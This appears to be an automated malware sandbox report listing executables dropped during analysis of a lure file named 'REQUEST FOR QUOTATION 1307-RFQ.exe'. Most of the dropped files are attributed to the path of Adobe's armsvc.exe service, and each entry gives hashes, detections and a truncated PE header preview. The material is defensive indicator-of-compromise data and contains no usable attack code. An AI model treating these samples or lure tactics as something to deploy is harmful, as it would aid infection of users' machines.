                                                                                                                                                                                                                            SSDEEP:24576:pC/KgVGJ0eeQ2yPyzc+E7xonyVGc/dT5N:hJLeQVPyzc+E7xQ2l
                                                                                                                                                                                                                            MD5:A4BEEF42793DEC8F04642E1950AF1A82
                                                                                                                                                                                                                            SHA1:67B77679E0FC1A801B48C5B41F8C625DF943D092
                                                                                                                                                                                                                            SHA-256:958B8FC734C2BECB8BA13317A945278B71A827950731234FA6751F81377AC621
                                                                                                                                                                                                                            SHA-512:8BE3F7DED9BB4CE813A523AE4A4B344B812FFF725EA2A78B86CDA762C3094A5C58AAE6A5A29A5305BE33945FA6087C9C22903C9154D59C027F4179F5ED559A07
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........jZ..9Z..9Z..9...9Q..9...9%..9...9B..9...8r..9...8K..9...8H..9S.x9W..9Z..9..9...8]..9...9[..9Z.|9[..9...8[..9RichZ..9........PE..L...C.(c.........."......:...........\.......P....@..........................P,.....W`......................................$...........0..............................8...............................@............P...............................text...19.......:.................. ..`.rdata...|...P...~...>..............@..@.data...............................@....rsrc...0...........................@..@.reloc.......`.......r..............@...........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1420800
                                                                                                                                                                                                                            Entropy (8bit):4.950215047864385
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24576:vKdHuGJ0eeQ2yPyzc+E7xonyVGc/dT5N:ydhJLeQVPyzc+E7xQ2l
                                                                                                                                                                                                                            MD5:1695882E0D4F983EE8B6BF1BEA8B9E9F
                                                                                                                                                                                                                            SHA1:8FFBFC633126AF4A6E1F3402D653DC990518CC20
                                                                                                                                                                                                                            SHA-256:1B8ABC08759A7E527C29ECC92D4B4CCF98003DEA1D76E152033D2E7FB1152ABE
                                                                                                                                                                                                                            SHA-512:A68474E910E23858E16B327BE667E00E79D1C550217746C61236D53A93ECE7BC43FDF9E8FA8AA8F602DAF6E046256B3C4C70B8A896CE8CEEEA09FC3976020334
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........9..X...X...X..-....X..-....X..-....X...0...X...0...X...0...X... n..X...X..YX..<1.X..<1...X...Xj..X..<1...X..Rich.X..........................PE..d...G.(c.........."......J...^......Tr.........@..............................,.....'].... .................................................,........ ..0...............................8............................................`..`............................text....H.......J.................. ..`.rdata.......`.......N..............@..@.data........ ......................@....pdata..............................@..@.rsrc...0.... ......."..............@..@.reloc..............................@...................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):2203136
                                                                                                                                                                                                                            Entropy (8bit):7.642446908339956
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:49152:TK0eqkSR7Xgo4TiRPnLWvJpJLeQVPyzc+E7xQ2l:TK0pR7Xn4TiRCvJp1vcbE7xQ2l
                                                                                                                                                                                                                            MD5:2E6D5F994313D2E083B432F252C27B3D
                                                                                                                                                                                                                            SHA1:8715E6F0C747E1925E84634F331823D59315CC56
                                                                                                                                                                                                                            SHA-256:6C1A2969DC330DD69D4F5C3AE155E57E1B961296EAE946C845CB257564CCADAB
                                                                                                                                                                                                                            SHA-512:99AA5C203304A13C23CBD636AE51AB7B703AE92BE1DEE528B22CA68DAA475A4568D274A1C44875379CF019E7B6A72AC4B315AAA490FDEBDE56D1C5E9ABB34C07
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...................Y;6....Y;4.x...Y;5...........................D......T...........H......H.8.....P....H......Rich...................PE..L...9.(c..........#..................d............@..........................."....."."..............................................p..X...............................p...............................@...............X............................text.............................. ..`.rdata..$H.......J..................@..@.data....@... ......................@....rsrc........p......................@...................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):2369024
                                                                                                                                                                                                                            Entropy (8bit):7.56162154618784
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:49152:lfYP1JsEDkSR7Xgo4TiRPnLWvJpJLeQVPyzc+E7xQ2l:1YPBR7Xn4TiRCvJp1vcbE7xQ2l
                                                                                                                                                                                                                            MD5:DB11D7715663EAD96782BB1AF10CD71C
                                                                                                                                                                                                                            SHA1:9FB0C684FFE80A503A3B32A20F9EB6AA155C1FA3
                                                                                                                                                                                                                            SHA-256:988342F5ACB473092DF6EB95AA1A76D531B0966D1D640B714B1F87C06193DFDC
                                                                                                                                                                                                                            SHA-512:D145DA4F5D138848CBCBE5B81C017F9F1905806C218FC198F04EFF5BF3DBF3659F50B98BF35A449F191ECDAC5493B0F7FC5EE44383C4A6FEF5C073667127CADE
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<y..x...x...x....~.s....|......}.a...*p..i...*p..p...*p..H...q`..z...q`..a...x...s....q..[....qp.y...x...z....q..y...Richx...........PE..d...>.(c..........#..........0......(..........@..............................$......v$... .............................................................X........e...................n..p...................0p..(...0o...............0...............................text............................... ..`.rdata.......0......."..............@..@.data....R...0... ... ..............@....pdata...e.......f...@..............@..@.rsrc...............................@...................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1351680
                                                                                                                                                                                                                            Entropy (8bit):4.7886467195236655
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24576:pYUcknQGJ0eeQ2yPyzc+E7xonyVGc/dT5N:pZcknnJLeQVPyzc+E7xQ2l
                                                                                                                                                                                                                            MD5:94D70456805CF6A086FF9DF8A5F2A7CD
                                                                                                                                                                                                                            SHA1:4DB02D17F4B1B37C30DB2E4A4DE128B07E694FC8
                                                                                                                                                                                                                            SHA-256:0988FB9FBDA3D1BAD61BA407710B9B0816DEC6CEB16A9DD12E5775D58CA9CF8A
                                                                                                                                                                                                                            SHA-512:D297B8F3CD9DDCD47FC3B95504C5FCDD956E346936ED8B6E8D4560559CAD6100B999A4899C371A9E0048F8889E3D0B8FB9ED423FBFC077085ECD4BF71F181F5C
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........[m..5>..5>..5>OC.>..5>OC.>..5>OC.>..5>..0?..5>..1?..5>..6?..5>.>..5>..4>..5>.>..5>^.<?..5>^..>..5>..>..5>^.7?..5>Rich..5>........................PE..L.....(c..........................................@..........................................................................%..d....P.................................8...............................@...............t............................text.............................. ..`.rdata...^.......`..................@..@.data...l....0....... ..............@....rsrc.......P.......*..............@..@.reloc..............................@...................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1640448
                                                                                                                                                                                                                            Entropy (8bit):7.159691591761195
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:49152:456AqSPyC+NltpScpzbtvpJoMQSq/jrQaSFJLeQVPyzc+E7xQ2l:LSktbpn1vcbE7xQ2l
                                                                                                                                                                                                                            MD5:84C118D36183CC19075010547994AED4
                                                                                                                                                                                                                            SHA1:DD35DF8F823304A14D761F21366396B0B759ADA4
                                                                                                                                                                                                                            SHA-256:76D27D88071FF9BD937EA75FCB86838BE8FA501FB5679A701E05C2D83C80E76C
                                                                                                                                                                                                                            SHA-512:F3FCB9BC32118A38D379CDAEADEB060150D395B35D6EB819CA894AC87158892036ADEAF1C21FD8AF68855AAE622D38A4D9BB71B8FD3E16D3F59CA1770BAD4399
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......}0tp9Q.#9Q.#9Q.#...#,Q.#...#.Q.#...#.Q.#...#8Q.#k9.".Q.#k9."(Q.#k9."1Q.#0).#1Q.#0).#8Q.#0).#.Q.#9Q.#.S.#.8."hQ.#.8."8Q.#.8.#8Q.#9Q.#;Q.#.8."8Q.#Rich9Q.#........PE..d...3.(c.........."......H...*.......Z.........@....................................j..... ...@...............@..............................l..|.......P....P...o.................. .......................p...(...@................`..8............................text...<G.......H.................. ..`.rdata..|B...`...D...L..............@..@.data... ........P..................@....pdata...o...P...p..................@..@.rsrc...P............P..............@..@.reloc...............(..............@...................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):2953728
                                                                                                                                                                                                                            Entropy (8bit):7.089750757390661
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:49152:fGSXoV72tpV9XE8Wwi1aCvYMdjluS/fYw44RxL+JLeQVPyzc+E7xQ2l:n4OEtwiICvYM3fe1vcbE7xQ2l
                                                                                                                                                                                                                            MD5:8243DFC323541E76C223E9F601027116
                                                                                                                                                                                                                            SHA1:398D1CCF4DFAEE841DBB5BBF57DF2686E37F6910
                                                                                                                                                                                                                            SHA-256:B55848DF229D036BFE26866479635C6175479ED8E40420672667A5B69BE6C5E7
                                                                                                                                                                                                                            SHA-512:E78792B61CE3BDB361F0C034F497640670B73D918770DB7769FFFB3630720D5E2471F921758E617A4F8C7C0DBAEFE11FAE7DE515CF8EBA9FF56A6F49027380BD
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Ark.Ark.Ark...o.Mrk...h.Jrk...n.^rk...j.Erk.H...Brk.H...nrk.Arj..pk...b.rk...k.@rk.....@rk...i.@rk.RichArk.........................PE..L.....(c.....................~....................@..........................P-.......-.............................p...<............@ .............................@...p...................P...........@............................................text...e........................... ..`.rdata...^.......`..................@..@.data...`....0......................@....rsrc........@ ....... .............@..@.reloc.......P#......"#.............@...................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1592320
                                                                                                                                                                                                                            Entropy (8bit):5.198498911798274
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24576:bAMvR+3kMbVjh6GJ0eeQ2yPyzc+E7xonyVGc/dT5N:8E+lbVjhtJLeQVPyzc+E7xQ2l
                                                                                                                                                                                                                            MD5:0DFDA19C79E3F34F8662777C221B6724
                                                                                                                                                                                                                            SHA1:D2220FD9990AFBA9AD496EEA2D6D5577EBACBF76
                                                                                                                                                                                                                            SHA-256:C8CE2666B7B2626ED14B72344362D6F7772778212D0F132E9690FE67810E4C4C
                                                                                                                                                                                                                            SHA-512:407D00292F7390EE57FAE7E3DD81CAB29F49213F9B68D4CB7F632F3F2AD0237BD023CE37DA04E9B698D7F4597D1ACF44B10F6860D7589FEF8F065B247E6E8955
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........4...Uu..Uu..Uu..=v..Uu..=q..Uu..=p.pUu..=s..Uu..8q..Uu..8v..Uu..8p.@Uu.....Uu..=t..Uu..Ut..Wu.Z;p..Uu.Z;...Uu..U...Uu.Z;w..Uu.Rich.Uu.................PE..L......d.................N...P...............`....@...........................".....I........................................`..@.......(...............................T...............................@............`..L............................text...zL.......N.................. ..`.rdata.......`.......R..............@..@.data...\D...........p..............@....rsrc...(...........................@..@.reloc...............<..............@...................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe
                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1396736
                                                                                                                                                                                                                            Entropy (8bit):4.946514465567763
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24576:nxGBcmlOGJ0eeQ2yPyzc+E7xonyVGc/dT5N:xGy+hJLeQVPyzc+E7xQ2l
                                                                                                                                                                                                                            MD5:56CC9A6FF09CF87495300EA7EEC67B33
                                                                                                                                                                                                                            SHA1:4D9D2B02942C84FFEA9946F3AFD4EABE58FC320C
                                                                                                                                                                                                                            SHA-256:0B98E8AF2D15A3642010B71EE28355E6DC8E2367AA2198D7C957844E165EF14E
                                                                                                                                                                                                                            SHA-512:9ACA563D19D08DA458C9C883FE72888BC28307F9662EBE64D53C3B7D61A70E76C66BF861447CDD52B7FC41E26D3CE7472D530E83609BC4F6B011B45716E26BD0
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........]...3...3...3...0...3...6.h.3.,.7...3.,.0...3.,.6...3...7...3...2...3...2.G.3.e.:...3.e....3.....3.e.1...3.Rich..3.................PE..L...}..d..........................................@..................................V......................................`D......................................@...p...........................p...@....................B.......................text.............................. ..`.rdata..t...........................@..@.data........`.......@..............@....didat..4............N..............@....rsrc................P..............@..@.reloc...............`..............@...........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1751040
                                                                                                                                                                                                                            Entropy (8bit):5.41817518973157
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24576:l0vHyTLj8trn3wsgGJ0eeQ2yPyzc+E7xonyVGc/dT5N:IWj4rgsXJLeQVPyzc+E7xQ2l
                                                                                                                                                                                                                            MD5:1E45B63BBC764DEDED9958639B575329
                                                                                                                                                                                                                            SHA1:9FFA795BD8292F20F6C17EE22E4CA148F3F9F22D
                                                                                                                                                                                                                            SHA-256:EEFD0DA3D7480B3511956D84C0B3BA7317A3FE5B5A979EECE05DEDE2CBADFBE2
                                                                                                                                                                                                                            SHA-512:95B39136936FA77E932E96E404B340D2543BA6B8DEB57E0E9222DB64D77229D0E87BBD271916C84F1147F307E18056993406D60311935B850B92797113CD108D
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g=H(#\&{#\&{#\&{77%z2\&{77#z.\&{A$.{"\&{A$"z1\&{A$%z5\&{A$#zu\&{77"z;\&{77 z"\&{77'z4\&{#\'{.\&{.%"z$\&{.%#z.\&{.%.{"\&{#\.{!\&{.%$z"\&{Rich#\&{........PE..L.....d............................7........0....@...........................$.....>.......................................<........P...|..........................0m..............................pl..@............0..t............................text...?........................... ..`.rdata.......0......................@..@.data....3....... ..................@....rsrc....|...P...~..................@..@.reloc... ....... ..................@...................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1781760
                                                                                                                                                                                                                            Entropy (8bit):7.271803891271068
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:49152:k4ijwGJra0uAUfkVy7/ZuJLeQVPyzc+E7xQ2l:kNjwGJrakUQyc1vcbE7xQ2l
                                                                                                                                                                                                                            MD5:32F2389D3F30D1518B8818E5039A5FB8
                                                                                                                                                                                                                            SHA1:2060272E9560339BD0C4AD5B62A7753C332DE7E8
                                                                                                                                                                                                                            SHA-256:DE0074C899DF9CDF200C99A93F403A9673554F2FBDCF92F8E24811F71794B4C9
                                                                                                                                                                                                                            SHA-512:DD91A7FFA18A5C2ACBA804EEE91E0AA0500F0267C1DB411F596AA767E52F611168DCDB913543FCD7D9DF3F95488C8AECD17C3AA4C9816E9CB1839C7B8AFCA458
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$...................................p.....l.......................................................<......<....<.n.............<......Rich............................PE..L.....d.................:...*...............P....@.............................................................................,.......................................................................@............P...............................text....8.......:.................. ..`.rdata.......P.......>..............@..@.data...PG...0...2..................@....rsrc................D..............@..@.reloc...p.......`..................@...................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1318400
                                                                                                                                                                                                                            Entropy (8bit):7.439021963190199
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24576:oeR0gB6axoCxyR6RLQRF/TzJqe58BimSGJ0eeQ2yPyzc+E7xonyVGc/dT5N:0gHxWR6uBTzge5Mim1JLeQVPyzc+E7xX
                                                                                                                                                                                                                            MD5:9A22EA1274998899F1B72C21BE5216B0
                                                                                                                                                                                                                            SHA1:F0F3D20AD4E4758A79F5A01D30E33BD1CFD36C5D
                                                                                                                                                                                                                            SHA-256:E6AB35D44555185FB079C3154BC0A84428DD83F375D0EA2F98073EC977B45F02
                                                                                                                                                                                                                            SHA-512:228DD1E6046F3A8B880C328FC1C9835A6F14C693A5F82A541FF5A907C05D686DDF5F89E2B8D43D77461AEEF8503C5E2A44D91DCB6064A25D1F9AD46135B032E5
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........r.b.!.b.!.b.!... .b.!... xb.!..1!.b.!... .b.!... .b.!... .b.!... .b.!... .b.!... .b.!.b.!.c.!?.. .b.!?.. .b.!?.3!.b.!.b[!.b.!?.. .b.!Rich.b.!........PE..L.....d..........................................@..........................`......";......................................t$.....................................`T...............................S..@............................................text...L........................... ..`.rdata..0Z.......\..................@..@.data...8<...@...(...&..............@....rsrc...............N..............@..@.reloc...P.......@..................@...................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1481728
                                                                                                                                                                                                                            Entropy (8bit):5.127063762940034
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24576:TpwOtO7wGJ0eeQ2yPyzc+E7xonyVGc/dT5N:TmOtmHJLeQVPyzc+E7xQ2l
                                                                                                                                                                                                                            MD5:B1FE490DDE2A96BDC5B0DCC7DC6D3640
                                                                                                                                                                                                                            SHA1:278B707C4A91EF06322713CCA2CA70942C6D3285
                                                                                                                                                                                                                            SHA-256:56C91851B237003497B64D4AAFEF39EC7398AF5A8C703FE00A3A530EE276412A
                                                                                                                                                                                                                            SHA-512:160D40FA6F4AB0E2D4AB8D4583DD3B6EF6ACDB586B8B64909F5A22BC0E053544384C162D7145BADFCD43695024E45859E1BF4820C6A94CA88DD30AD3AFD637E2
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x..F<...<...<...(..3...(......(......^.F.;...^......^......^..)...(..5...<...N......3.....D.=......=...Rich<...........................PE..L.....d.................N...t....../........`....@........................... .....L........................................!..d....P..............................P...T...............................@............`...............................text...\M.......N.................. ..`.rdata..@....`.......R..............@..@.data........0......................@....rsrc........P.......*..............@..@.reloc..............................@...........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1481728
                                                                                                                                                                                                                            Entropy (8bit):5.127773715232804
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24576:2KU/h/4KtGJ0eeQ2yPyzc+E7xonyVGc/dT5N:2r/VYJLeQVPyzc+E7xQ2l
                                                                                                                                                                                                                            MD5:B8EEE92BB1C3DB5D847C1A0ED9E80487
                                                                                                                                                                                                                            SHA1:01BDC7D78DE2ABBD0B905BFC33A0FABF49718A0B
                                                                                                                                                                                                                            SHA-256:4BFA99921109690EE4B46E9491403FAFE660CB683BE894F8D2C48D2F7FFEFA23
                                                                                                                                                                                                                            SHA-512:AF630F42EE2958688AACCF7CB9FA6822113C3FEFBE68A7BB8CD9D2D9BBA8A7F381F10A74589A2B12F121C2C2D26BDA561B659EE8D4AA6E9A8A5F7B20B1ECB9E1
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9..#}..p}..p}..pi.qr..pi.q..pi.qo..p..}pz..p..qX..p..qo..p..qh..pi.qt..p}..p...p..qr..p...p|..p..q|..pRich}..p........................PE..L.....d.................N...t......7........`....@........................... .....:g.......................................!..d....P.............................P...T...............................@............`...............................text....M.......N.................. ..`.rdata..@....`.......R..............@..@.data........0......................@....rsrc.......P.......*..............@..@.reloc..............................@...........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1620480
                                                                                                                                                                                                                            Entropy (8bit):5.1912702514724245
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24576:Ax7YiBLZ05jNTmJWExkGJ0eeQ2yPyzc+E7xonyVGc/dT5N:AxUiHIjNg7JLeQVPyzc+E7xQ2l
                                                                                                                                                                                                                            MD5:325BD3DC7963260605C590A1F7BDEEAB
                                                                                                                                                                                                                            SHA1:B0E4FE16672C92277381300B46BFCBFADD853630
                                                                                                                                                                                                                            SHA-256:9F53FF47933B9192DAE985372E6AE292CF7DBCDCC218FD65AAF55650658C0409
                                                                                                                                                                                                                            SHA-512:1D8612FB89801BCAAA62FEE131E742A03B1DD5380D100CC48AC9AE495292411878AF471839BAD2730C3A65378F4BBD86DF919C93555BC9AAC1DA7B37283D1832
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......p...4rv.4rv.4rv. .u.>rv. .s..rv. .r.&rv.V.r.!rv.V.u.,rv.V.s..rv. .w.?rv.4rw..rv..r.&rv..s.0rv....5rv..t.5rv.Rich4rv.................PE..L.....d............................^.............@..........................0$......+..........................................x...................................L...T............................4..@...................,........................text...,........................... ..`.rdata..:(.......*..................@..@.data............t..................@....rsrc................:..............@..@.reloc.......0......................@...................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1525760
                                                                                                                                                                                                                            Entropy (8bit):5.156197933912794
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24576:SlnRkld6fgJcEwix6GJ0eeQ2yPyzc+E7xonyVGc/dT5N:GokfgJcEwCtJLeQVPyzc+E7xQ2l
                                                                                                                                                                                                                            MD5:A61047A21719D5B2A0320892F25F383A
                                                                                                                                                                                                                            SHA1:DBB6C3E04F9CE9B07D2275F1F67662916233BE37
                                                                                                                                                                                                                            SHA-256:AE7E17A10249B1C4577983AC34D25E4B1C775818AFD36330491AE5F3BEA3AF0F
                                                                                                                                                                                                                            SHA-512:849A68C8B3F5A9CD08F395DF4D3310BEA3E54C2787A42F4C885173B37272F3AB940467DA2BCF4DDA86AE8B93DAFFABF373A13D35DF41B08EC03CF5131042D8CC
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
